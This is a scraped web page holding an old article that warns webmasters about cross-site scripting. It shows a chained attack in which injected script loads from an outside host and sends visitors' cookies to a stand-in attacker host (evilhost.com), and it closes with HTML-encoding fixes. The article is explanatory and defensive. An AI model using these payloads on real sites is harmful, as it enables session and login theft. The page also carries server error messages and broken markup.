"What makes a river so restful to people is that it doesn't have any doubt - it is sure to get where it is going, and it doesn't want to go anywhere else."Hal Boyle
|
Warning: fopen(stopka/index.php) [function.fopen]: failed to open stream: No such file or directory in /stopka.php on line 117
Warning: fopen(stopka/6655d922aa2c1bbb44b556c10262be35.txt) [function.fopen]: failed to open stream: No such file or directory in /stopka.php on line 117
| |
Improve Your Visitors Experience - Add Scripts to Your Website
For new webmasters, adding third-party software and scripting to a website can be a really scary proposition. I remember when I put my first scripts on my own website. Even with my basic dos programming experience in high school, I was still intimidated ...
Showing and Hiding HTML elements using Layers
A long time back I visited a site that had a very fancy, animated navigation bar. Now, as a professional web developer, I'm not in favor of DHTML-supported, fancy navigation bars, but it was very fascinating. What they had done was, whenever you hovered ...
Watermarks
PLEASE VISIT WWW.HTMLBLOCK.CO.UKFOR HTML ENCRYPTION ANDANONYMOUS EMAIL SERVICE!Welcome to htmlblock.co.ukProtecting Websites WorldwideProtect your website with htmlblock.co.uk. Our software package gives you the highest in encryption and security levels ...
|
|
|
| |
In this little paper I will try to convince admins, webmaster and in general everyone is concerned to secure a web site of how dangerous can be a XSS hole. I will not cover in depth what XSS is because there's a huge library on this topic available on internet and on www.hackerscenter.com/library
--[ 2.0 XSS So what's XSS? XSS stands for cross site scripting, that is a way to inject script code into a web page making it execute whenever the page loads or a specific event is triggered.
2.1 Temporary XSS
A factor because of which this kind of bug is understimated is due to the "temporary xss" as I use to call them. Temporary xss are script codes executed only when a script code within a crafted input is issued by the user.
Example: http://vuln.host.com/search.asp?q=<![CDATA[<br /> The above example will inject a "<plaintext>" tag in the search.asp page showing the source html code of the page The point here is: Who searched for <plaintext> will see the source code but this not implies any permanent alteration of the page.<br /> 2.2 Permanent XSS<br /> A "permanent XSS" as I use to call them, are due to unsanitized input by user that will be saved on a database for example. Each time these unsanitized fields are read from the database and printed on the page the script will be executed. (A lot of registration forms server side scripts are affected by this kind of vuln)<br /> <br /> --[ 3.0 Attacks<br /> What I want to demonstrate in this article is how dangerous can be a temporary xss. Most of the webmaster (99%, believe me), treat this kind of bug as very very low level issue because of the reasons we have seen. They think it is even a loss of time to sanitize input that doesn't go into a database.<br /> What they seem to be unable to understand is that whenever a malicious user is able to run a client side script from their domain name a cookie stealing attack can be *easily* taken. This becomes a high level risk vuln when we deal with ecommerce site, webmail service and similar.<br /> 3.1 Scenario 1<br /> Let's assume that we've found a xss vuln into 2 sites. The first will be used as the "dumb" (A) site, that has a permanent xss hole, while the latter will be a big shopping portal (B) I want to steal cookie from, that has "just" a little innocent temporary xss hole.<br /> We mail the big shopping portal admin about the vuln, trying to make him understand how serious it is the bug. He never reply. So we decide to have some fun...innocent fun..as much innocent as their xss hole was, I suppose...<br /> What one could do is to inject a stealth script into the dumb site to force (always stealthly) every visitor of site A to load the vulnerable url we have found into site B. Here anyone can understand that even <a href="http://vuln.host.com/search.asp?q=">http://vuln.host.com/search.asp?q=</a><plaintext> is now very very useful for our purpose. Instead of <plaintext>, we can use something like this: <a href="http://vuln.host.com/search.asp?q=">http://vuln.host.com/search.asp?q=</a><script src='<a href="http://myhosting.com/xsstrials/funny.js'></script>">http://myhosting.com/xsstrials/funny.js'></script></a>;<br /> Funny.js will be our malicious script code that will be run on vuln.host.com domain ...and it will be similar to this: // Funny.js navigate to 'evilhost.com/collect_cookies.asp?cookie=' + document.cookie // where collect_cookies.asp will be a server side script that will collect everything passed by parameter "cookie" and evilhost.com can be a hosting space set up by the malicious attacker.<br /> So what happens here? 1. A user visits dumb site thus triggering our permanent xss. 2. The permanent xss will load the page <a href="http://vuln.host.com/search.asp?q=">http://vuln.host.com/search.asp?q=</a><script src='<a href="http://myhosting.com/xsstrials/funny.js'></script> ">http://myhosting.com/xsstrials/funny.js'></script> </a> that executes funny.js thanks to the temporary xss hole in the big shopping portal. 3. funny.js is now loaded on the big shopping portal domain name letting us steal the cookie (and the login data) of the dumb site visitor.<br /> By "stealth script" we mean a script that doesn't change the appearance of the page so that no one will notice any background work.<br /> -- [ Side effects<br /> In this section I will show some side effects of the xss desease that are often forgotten or misunderstood by a lot of analysts/webmasters.<br /> The xss holes, permanent and tempory ones, can be used to attack a local victim (visitor of the vulnerable site) directly by injecting a malicious code capable of exploting a local vulnerability of the victim system. This has become very common (and easy to do) because of the tons of vulnerabilities that affect Internet Explorer and the browsers in general. <br /> Let's take for example a xss hole into trustedsite.com. Anyone could take advantage of the trustness of this domain to execute code with high privilege levels, executing or installing malicious activex. This kind of approach can be taken into Internet Exlporer and in general in all the browsers that use the so called trusted "Zones".<br /> Another important issue that can make a simple XSS hole a high level risk issue is the capability of attacking thousands computers into few hours or even into minutes according to the traffic of the vulnerable page. This kind of practice can lead to malware/adware spread. If a high traffic page is vulnerable to a permanent xss a malware/worm/adware coder can choose this kind of approach to put the seeds of his worm making it spread in a stealth manner and within few time.<br /> -- [ How to solve the problem<br /> Incredible to say, XSS holes are the most simple to solve and fix. They usually involve script tag but not always. Less known code can use the image tag with dynsrc or src parameters and "javascript:alert('aaa')" as argument or the <style> tag e.g. : <style type="text/javascript">script goes here</style><br /> In general the characters to be sanitized are the usual "<" and ">" but there are some more to be carefully escaped: &{code}; will run the code into netscape / mozilla browsers so "&{" combination of chars should be sanitized too. In the 99% of the cases an "HTML Encode" would solve the problem. In asp it can be easily done with the inbuilt function server.htmlencode(myparameter).<br /> <br /> About the Author <br />Zinho is webmaster and founder of <a href="http://www.hackerscenter.com">http://www.hackerscenter.com</a> , a leading security portal with texts and articles to help securing web sites and networks. </b>
<br><br>
</span>
</td>
</tr>
</table>
</div> </td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
<center><div id="contentHeader3">Javascript News</div></center>
<p align="left">
<br><img src="/images/google_news.gif" /><table border="0" cellpadding="2" cellspacing="7" style="vertical-align:top;"><tr><td width="80" align="center" valign="top"><font style="font-size:85%;font-family:arial,sans-serif"></font></td><td valign="top" class="j"><font style="font-size:85%;font-family:arial,sans-serif"><br /><div style="padding-top:0.8em;"><img alt="" height="1" width="1" /></div><div class="lh"><a href="http://news.google.com/news/url?sa=t&fd=R&usg=AFQjCNEIY7_qiWI5gZmbD4AJTO_dkgamMQ&url=http://www.i-programmer.info/news/81-web-general/4248-google-now-searches-javascript.html"><b>Google Now Searches <b>JavaScript</b></b></a><br /><font size="-1"><b><font color="#6f6f6f">iProgrammer</font></b></font><br /><font size="-1">A big problem is how search bots deal with dynamic content - and <b>JavaScript</b>/Ajax is a tough one to solve. For example, you could have a page that never used a URL to move to another page but simply refreshed its contents either every so often or when <b>...</b></font><br /><font size="-1" class="p"></font><br /><font class="p" size="-1"><a class="p" href="http://news.google.com/news/more?ned=us&ncl=dMP-6Hkj17ussfM"><nobr><b></b></nobr></a></font></div></font></td></tr></table><table border="0" cellpadding="2" cellspacing="7" style="vertical-align:top;"><tr><td width="80" align="center" valign="top"><font style="font-size:85%;font-family:arial,sans-serif"></font></td><td valign="top" class="j"><font style="font-size:85%;font-family:arial,sans-serif"><br /><div style="padding-top:0.8em;"><img alt="" height="1" width="1" /></div><div class="lh"><a href="http://news.google.com/news/url?sa=t&fd=R&usg=AFQjCNHKp_lZp5pmLk4kbM06bLTiGdJXUw&url=http://www.sfgate.com/cgi-bin/article.cgi?f%3D/g/a/2012/05/24/prweb9540564.DTL"><b>WSO2 to Present Technical Webinar on Using Jaggery as a Server-Side <b>JavaScript</b> <b>...</b></b></a><br /><font size="-1"><b><font color="#6f6f6f">San Francisco Chronicle (press release)</font></b></font><br /><font size="-1">WSO2 webinar on May 31, explores how Jaggery provides an intuitive pure <b>JavaScript</b> server-side scripting engine for flexible Web application development and deployment Palo Alto, CA (PRWEB) May 24, 2012 Developing a Web application today is like <b>...</b></font><br /><font size="-1" class="p"></font><br /><font class="p" size="-1"><a class="p" href="http://news.google.com/news/more?ned=us&ncl=dNla08MqjXkIWxM"><nobr><b>and more »</b></nobr></a></font></div></font></td></tr></table><table border="0" cellpadding="2" cellspacing="7" style="vertical-align:top;"><tr><td width="80" align="center" valign="top"><font style="font-size:85%;font-family:arial,sans-serif"><a href="http://news.google.com/news/url?sa=t&fd=R&usg=AFQjCNEGVQhDjaSDWc3rDDE1HEzFsvMu6g&url=http://hamptonroads.com/2012/05/teen-admits-chesapeake-attack-exnfl-player"><img src="//nt3.ggpht.com/news/tbn/u0_RAqpgXHqc1M/6.jpg" alt="" border="1" width="80" height="80" /><br /><font size="-2">The Virginian-Pilot</font></a></font></td><td valign="top" class="j"><font style="font-size:85%;font-family:arial,sans-serif"><br /><div style="padding-top:0.8em;"><img alt="" height="1" width="1" /></div><div class="lh"><a href="http://news.google.com/news/url?sa=t&fd=R&usg=AFQjCNEGVQhDjaSDWc3rDDE1HEzFsvMu6g&url=http://hamptonroads.com/2012/05/teen-admits-chesapeake-attack-exnfl-player"><b>Teen admits to Chesapeake attack on ex-NFL player</b></a><br /><font size="-1"><b><font color="#6f6f6f">The Virginian-Pilot</font></b></font><br /><font size="-1">In order to get the best experience with our full-size images, you should enable <b>JavaScript</b> in your browser. Ed Beard, a South Norfolk native and high school star, played for the San Francisco 49ers. Ed Beard, 71, suffered a concussion, <b>...</b></font><br /><font size="-1" class="p"></font><br /><font class="p" size="-1"><a class="p" href="http://news.google.com/news/more?ned=us&ncl=dbntsEBwbOzolyM"><nobr><b>and more »</b></nobr></a></font></div></font></td></tr></table><table border="0" cellpadding="2" cellspacing="7" style="vertical-align:top;"><tr><td width="80" align="center" valign="top"><font style="font-size:85%;font-family:arial,sans-serif"><a href="http://news.google.com/news/url?sa=t&fd=R&usg=AFQjCNGW9YnbEVqJCP0oxpYyxlrGxmjafg&url=http://www.smh.com.au/rugby-league/league-match-report/melbourne-weather-origin-storm-to-tame-broncos-20120525-1z9ks.html"><img src="//nt1.ggpht.com/news/tbn/UTW4g7qpNudleM/6.jpg" alt="" border="1" width="80" height="80" /><br /><font size="-2">Sydney Morning Herald</font></a></font></td><td valign="top" class="j"><font style="font-size:85%;font-family:arial,sans-serif"><br /><div style="padding-top:0.8em;"><img alt="" height="1" width="1" /></div><div class="lh"><a href="http://news.google.com/news/url?sa=t&fd=R&usg=AFQjCNHK0nrzyGrP8rL2--F4z1u1vI_20w&url=http://www.heraldsun.com.au/sport/nrl/billy-slater-and-storm-show-broncos-why-they-are-still-no1/story-e6frfgcx-1226367589004"><b>Billy Slater and Storm show Broncos why they are still No.1</b></a><br /><font size="-1"><b><font color="#6f6f6f">Herald Sun</font></b></font><br /><font size="-1">Video Video Video Image Please install the latest Flash player [To view Flash please enable <b>JavaScript</b> and Flash.] Please install the latest Flash player [To view Flash please enable <b>JavaScript</b> and Flash.] Please install the latest Flash player [To <b>...</b></font><br /><font size="-1"><a href="http://news.google.com/news/url?sa=t&fd=R&usg=AFQjCNH3u1pUKjDXP201vdiUBUfkxdkBQw&url=http://www.couriermail.com.au/sport/nrl/billy-slater-crosses-for-two-tries-as-melbourne-storm-beat-brisbane-broncos-34-10-at-aami-park/story-e6frep5x-1226367427830">Anthony Griffin laments poor performance as Storm thrash Broncos 34-10 at AAMI <b>...</b></a><font size="-1" color="#6f6f6f"><nobr>Courier Mail</nobr></font></font><br /><font size="-1" class="p"></font><br /><font class="p" size="-1"><a class="p" href="http://news.google.com/news/more?ned=us&ncl=dDudkX8yJYEzG_M-HXqXUO6hhvXCM"><nobr><b>all 60 news articles »</b></nobr></a></font></div></font></td></tr></table><table border="0" cellpadding="2" cellspacing="7" style="vertical-align:top;"><tr><td width="80" align="center" valign="top"><font style="font-size:85%;font-family:arial,sans-serif"></font></td><td valign="top" class="j"><font style="font-size:85%;font-family:arial,sans-serif"><br /><div style="padding-top:0.8em;"><img alt="" height="1" width="1" /></div><div class="lh"><a href="http://news.google.com/news/url?sa=t&fd=R&usg=AFQjCNHH_cFF_gIlJHtHAUDxXYiG94nHxQ&url=http://abcnews.go.com/US/wireStory/park-animatronic-dinosaurs-opening-nj-16433752"><b>Park of Animatronic Dinosaurs Opening in NJ</b></a><br /><font size="-1"><b><font color="#6f6f6f">ABC News</font></b></font><br /><font size="-1"><b>Javascript</b> is not enabled on your browser. Please enable <b>javascript</b> to use the community features on this page. If your browser does not support <b>javascript</b>, please visit our browser upgrade page for a list of supported web browsers.</font><br /><font size="-1" class="p"></font><br /><font class="p" size="-1"><a class="p" href="http://news.google.com/news/more?ned=us&ncl=dNtpgeXU5_LPfqM"><nobr><b>and more »</b></nobr></a></font></div></font></td></tr></table>
<br>
<div align="center">
<!-- Begin PayPal Logo -->
<a href="https://www.paypal.com/us/mrb/pal=dolec@post.pl" target="_blank">
<img src="http://www.askuanswerme.com/images/paypal_mrb_banner.gif" border="0" alt="Sign up for PayPal and start accepting credit card payments instantly."></img>
</a>
<!-- End PayPal Logo -->
</div>
</td>
</tr>
</table>
</div>
<div id="divBaseLinks">
<span style="font:Arial, Helvetica, sans-serif; font-size:10px; color:#000000">©
<script type="text/javascript">
<!--
var year=mydate.getYear()
if (year < 1000)
year+=1900
document.write(""+year+"")
// -->
</script>
<a href="http://www.askuanswerme.com">ASK YOU ANSWER ME</a> - All Rights Reserved.
</span>
<br />
<div id="footer" align="center">
<a href="../acne/index.php" class="toplinks">Acne</a> -
<a href="../addictions/index.php" class="toplinks">Addictions</a> -
<a href="../aerobics/index.php" class="toplinks">Aerobics</a> -
<a href="../allowance/index.php" class="toplinks">Allowance</a> -
<a href="../auctions/index.php" class="toplinks">Auctions</a> -
<a href="../breastcancer/index.php" class="toplinks">Breast Cancer</a> -
<a href="../budgeting/index.php" class="toplinks">Budgeting</a> -
<a href="../business/index.php" class="toplinks">Business</a> -
<a href="../computers/index.php" class="toplinks">Computers</a> -
<a href="../cooking/index.php" class="toplinks">Cooking</a> -
<a href="../credit/index.php" class="toplinks">Credit</a><br>
<a href="../creditcards/index.php" class="toplinks">Credit Cards</a> -
<a href="../currencytrading/index.php" class="toplinks">Currency Trading</a> -
<a href="../debt/index.php" class="toplinks">Debt</a> -
<a href="../debtconsolidation/index.php" class="toplinks">Debt Consolidation</a> -
<a href="../dental/index.php" class="toplinks">Dental</a> -
<a href="../depression/index.php" class="toplinks">Depression</a> -
<a href="../diabetes/index.php" class="toplinks">Diabetes</a> -
<a href="../diets/index.php" class="toplinks">Diets</a> -
<a href="../domainnames/index.php" class="toplinks">Domain Names</a><br>
<a href="../downloads/index.php" class="toplinks">Downloads</a> -
<a href="../ebay/index.php" class="toplinks">Ebay</a> -
<a href="../ebooks/index.php" class="toplinks">Ebooks</a> -
<a href="../ecommerce/index.php" class="toplinks">Ecommerce</a> -
<a href="../emailmarketing/index.php" class="toplinks">Email Marketing</a> -
<a href="../exercise/index.php" class="toplinks">Exercise</a> -
<a href="../finance/index.php" class="toplinks">Finance</a> -
<a href="../food/index.php" class="toplinks">Food</a> -
<a href="../freestuff/index.php" class="toplinks">Free Stuff</a> -
<a href="../health/index.php" class="toplinks">Health</a> -
<a href="../healthyeating/index.php" class="toplinks">Healthy Eating</a> -
<a href="../heloc/index.php" class="toplinks">Heloc</a> -
<a href="../homebusiness/index.php" class="toplinks">Home Business</a> -
<a href="../html/index.php" class="toplinks">HTML</a> -
<a href="../insurance/index.php" class="toplinks">Insurance</a> -
<a href="../internetmarketing/index.php" class="toplinks">Internet Marketing</a> -
<a href="../investing/index.php" class="toplinks">Investing</a> -
<a href="../javascript/index.php" class="toplinks">Javascript</a> -
<a href="../loans/index.php" class="toplinks">Loans</a> -
<a href="../lungasbestos/index.php" class="toplinks">Lung Asbestos</a><br>
<a href="../marketing/index.php" class="toplinks">Marketing</a> -
<a href="../medicine/index.php" class="toplinks">Medicine</a> -
<a href="../meditation/index.php" class="toplinks">Meditation</a> -
<a href="../money/index.php" class="toplinks">Money</a> -
<a href="../mortgagerefinance/index.php" class="toplinks">Mortgage Refinance</a> -
<a href="../mp3/index.php" class="toplinks">MP3</a> -
<a href="../networkmarketing/index.php" class="toplinks">Network Marketing</a> -
<a href="../nutrition/index.php" class="toplinks">Nutrition</a> -
<a href="../onlinepromotion/index.php" class="toplinks">Online Promotion</a><br>
<a href="../paydayloans/index.php" class="toplinks">Payday Loans</a> -
<a href="../personalfinance/index.php" class="toplinks">Personal Finance</a> -
<a href="../positiveattitude/index.php" class="toplinks">Positive Attitude</a> -
<a href="../pregnancy/index.php" class="toplinks">Pregnancy</a> -
<a href="../realestate/index.php" class="toplinks">Real Estate</a> -
<a href="../recipes/index.php" class="toplinks">Recipes</a> -
<a href="../savings/index.php" class="toplinks">Savings</a> -
<a href="../searchengines/index.php" class="toplinks">Search Engines</a><br>
<a href="../selfhelp/index.php" class="toplinks">Self Help</a> -
<a href="../sitepromotion/index.php" class="toplinks">Site Promotion</a> -
<a href="../skincare/index.php" class="toplinks">Skin Care</a> -
<a href="../smallbusiness/index.php" class="toplinks">Small Business</a> -
<a href="../smoking/index.php" class="toplinks">Smoking</a> -
<a href="../software/index.php" class="toplinks">Software</a> -
<a href="../stockmutualfunds/index.php" class="toplinks">Stocks Mutual Funds</a><br>
<a href="../structuredsettlements/index.php" class="toplinks">Structured Settlements</a> -
<a href="../taxes/index.php" class="toplinks">Taxes</a> -
<a href="../technology/index.php" class="toplinks">Technology</a> -
<a href="../videoconferencing/index.php" class="toplinks">Video Conferencing</a> -
<a href="../voip/index.php" class="toplinks">VOIP</a> -
<a href="../webdesign/index.php" class="toplinks">Web Design</a><br>
<a href="../webdevelopment/index.php" class="toplinks">Web Development</a>
<a href="../webhosting/index.php" class="toplinks">Web Hosting</a> -
<a href="../weightloss/index.php" class="toplinks">Weight Loss</a> -
<a href="../wifi/index.php" class="toplinks">Wifi</a> -
<a href="../yoga/index.php" class="toplinks">Yoga</a>
</div>
<br>
</div>
</div>
</td>
</tr>
</table>
</div>
<br>
<center></center>
<br>
</body>
</html>
]]></plaintext></span></td></tr></table></div></td></tr></table></td></tr></table></td></tr></table></td></tr></table></td></tr></table></td></tr></div> | | | | | | |
